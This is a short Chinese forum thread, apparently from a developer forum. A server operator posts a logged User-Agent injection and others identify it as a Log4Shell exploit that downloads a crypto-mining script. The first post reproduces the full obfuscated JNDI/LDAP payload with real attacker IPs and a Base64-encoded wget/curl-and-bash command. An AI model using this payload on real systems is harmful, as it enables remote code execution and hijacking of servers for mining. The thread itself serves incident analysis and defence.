年前部署一个接口服务,通过日志,最近发现经常有 User-Agent 异常注入的访问 其中一个比较诡异的内容:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')
知道这是干嘛的吗
1
ThirdFlame 2022-02-10 10:15:25 +08:00
log4shell
|
2
silverfox 2022-02-10 10:21:03 +08:00
|
3
zhazi 2022-02-10 10:22:30 +08:00
|
4
maichaide 2022-02-10 11:03:53 +08:00
下载脚本开启探矿服务
|
5
muzuiget 2022-02-10 13:28:35 +08:00
Log4j 漏洞,就是赌你用 Log4j 把 UserAgent 记录到日志中,实现远程执行代码。
|
6
yundun2021 2022-02-10 13:34:59 +08:00
有条件可以上 WAF
|
7
yu1u 2022-02-10 13:47:12 +08:00
log4j 漏洞攻击
|
8
0x73346b757234 2022-02-10 18:04:25 +08:00
对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本,测了下自己的规则能覆盖,嘿嘿。
|
11
kaka6 OP 又收到不少的 User-Agent:
Go-http-client/1.1 python-requests/2.20.1 curl/7.75.0 而且还来自世界各地,以前没做这么细的记录,现在全网做记录,发现了不少莫明访客 |